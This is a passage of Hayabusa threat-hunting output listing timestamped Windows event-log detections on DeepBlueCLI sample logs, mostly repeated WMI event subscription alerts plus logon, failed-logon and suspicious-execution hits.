02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:46:57.850 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:48:29.225 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:48:29.850 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 
+2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not 
Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:58:14.879 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:32:03.644 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:35:43.160 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:37:00.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:41:07.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:44:49.144 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:33.988 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:57:47.863 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:00:03.457 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:02:44.129 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:02:44.129 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
